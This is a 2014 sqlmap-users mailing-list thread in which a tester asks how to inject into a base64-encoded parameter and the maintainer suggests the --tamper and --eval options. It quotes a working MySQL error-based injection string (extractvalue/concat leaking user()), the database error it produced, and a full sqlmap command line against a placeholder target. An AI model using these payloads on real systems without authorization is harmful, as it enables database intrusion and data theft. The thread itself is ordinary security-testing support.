Cheers, works!
--
Konrads Smelkovs
Applied IT sorcery.
On 2 November 2014 17:10, Miroslav Stampar <miroslav.stam...@gmail.com>
wrote:
> Then please try --eval instead of --tamper.
>
> E.g. --eval="param=param.encode('base64')"
>
> Bye
> On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <konr...@smelkovs.com> wrote:
>
>> Miroslav,
>>
>> I previously exploited this manually. The injection occurs in the mysql
>> INSERT statement. If the statement is invalid, we get an error message in
>> html comments like so:
>>
>> <!--You have an error in your SQL syntax; check the manual that
>> corresponds to your MySQL server version for the right syntax to use near
>> ''lalalaa))) or'')' at line 1-->
>>
>> Which then is exploitable using some well documented methods such as
>> appending string like this:
>> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>>
>> which gives us a nice error:
>> <!--XPATH syntax error: '~root@localhost'-->
>>
>>
>> Anyhow, I got halfway there with the following string:
>> sqlmap -u '
>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337'
>> --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>> sqlmap sends correctly encoded test vectors, but it doesn't send the
>> correct initial URL stability check vector:
>>
>> 1st request URL:
>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
>> 2nd request URL: https://target/script.php?
>> data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>>
>> Also none of the test vectors seem to trigger an error response.
>>
>> I tried with --risk=3 with no avail.
>>
>> version: 1.0-dev-1ef2c40
>>
>> --
>> Konrads Smelkovs
>> Applied IT sorcery.
>>
>> On 30 October 2014 13:12, Miroslav Stampar <miroslav.stam...@gmail.com>
>> wrote:
>>
>>> Hi.
>>>
>>> In your case I would do this:
>>>
>>> 1) Decode original base64 value and give it to the sqlmap in decoded
>>> form (e.g. id=123 instead of original id=313233)
>>> 2) Use --tamper=base64encode
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <konr...@smelkovs.com>
>>> wrote:
>>>
>>>> Hello,
>>>>
>>>> I am writing a small modification which would allow to tamper/decode
>>>> variables in the request?
>>>> As I understand that the parameters are decoded/parsed into a dict
>>>> after option.py:2323 (parseTargetDirect()), but where can I access the
>>>> full, parsed dict of the get/post/cookie values?
>>>>
>>>> (specifically I have a base64 encoded string as a parameter and to
>>>> insert the payload, the parameter must be base64-decoded, injected and
>>>> then encoded back)
>>>>
>>>>
>>>> --
>>>> Konrads Smelkovs
>>>> Applied IT sorcery.
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sqlmap-users@lists.sourceforge.net
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
------------------------------------------------------------------------------
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
